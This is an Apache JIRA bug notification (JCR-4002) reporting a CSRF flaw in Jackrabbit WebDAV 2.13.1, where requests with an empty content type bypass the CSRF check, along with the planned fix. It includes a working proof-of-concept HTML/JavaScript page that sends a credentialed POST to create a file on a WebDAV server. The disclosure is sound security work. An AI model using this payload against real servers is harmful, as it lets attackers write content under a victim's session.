Dominique Jäggi created JCR-4002:
------------------------------------
Summary: CSRF in Jackrabbit-Webdav using empty content-type
Key: JCR-4002
URL: https://issues.apache.org/jira/browse/JCR-4002
Project: Jackrabbit Content Repository
Issue Type: Bug
Components: jackrabbit-webdav
Affects Versions: 2.13.1
Reporter: Dominique Jäggi
Assignee: Dominique Jäggi
Fix For: 2.13.2
As per [0] the CSRF content-type check does not include a null request content
type. This can be exploited to create a resource via CSRF like so:
{code}
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost:42427/test/csrf.txt";, true);
xhr.withCredentials = true;
var body = "This file has been uploaded via CSRF.=\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
{code}
I will mitigate this particular issue by including a null content type in the
list of rejected content types.
[0] https://github.com/cryptomator/cryptomator/issues/319
--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
